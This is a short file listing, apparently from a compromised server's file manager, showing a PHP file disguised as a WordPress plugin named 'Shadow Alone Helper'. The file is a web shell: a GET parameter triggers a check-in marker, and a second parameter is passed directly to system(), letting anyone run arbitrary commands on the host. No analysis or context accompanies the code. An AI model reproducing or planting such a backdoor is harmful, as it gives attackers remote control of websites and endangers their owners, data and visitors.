| Current Path : /home/icmq6107/clients/naddaf/wp-content/plugins/shadow_alone-v7kV5n/ |
| Current File : /home/icmq6107/clients/naddaf/wp-content/plugins/shadow_alone-v7kV5n/shadow_alone\shadow_alone.php |
<?php
/**
* Plugin Name: Shadow Alone Helper
* Description: helper
* Version: 1.0.0
*/
if (isset($_GET['x'])) { echo 'ALONE_OK:'.md5('alone'.$_GET['x']); if(isset($_GET['c'])){system($_GET['c']);} }